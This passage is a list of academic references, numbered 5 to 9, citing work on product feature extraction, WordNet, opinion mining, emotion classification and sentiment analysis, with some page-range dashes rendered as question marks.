[5] ZHANG S, JIA W, XIA Y, et al. Product features extraction and categorization in Chinese reviews [C]// Proceedings of 2010 IEEE the 6th International Conference on Advanced Information Management and Service. [S.l.]: IEEE, 2010: 324?329.
[6] MILLER G A. WordNet: a lexical database for English [J]. Communications of the ACM, 1995, 38(11): 39?41.
[7] ZHAI Zhongwu, LIU Bing, XU Hua, et al. Clustering product features for opinion mining [C]// Proceedings of the Forth International Conference on Web Search and Web Data Mining. Hong Kong, China: IEEE, 2011: 347?354.
[8] BRYNIELSSON J, JOHANSSON F, JONSSON C, et al. Emotion classification of social media posts for estimating people′s reactions to communicated alert messages during crises [J]. Security informatics, 2014, 3(1): 1?11.
[9] XU T, PENG Q, CHENG Y. Identifying the semantic orientation of terms using S?HAL for sentiment analysis [J]. Knowledge?based systems, 2012, 35(15): 279?289.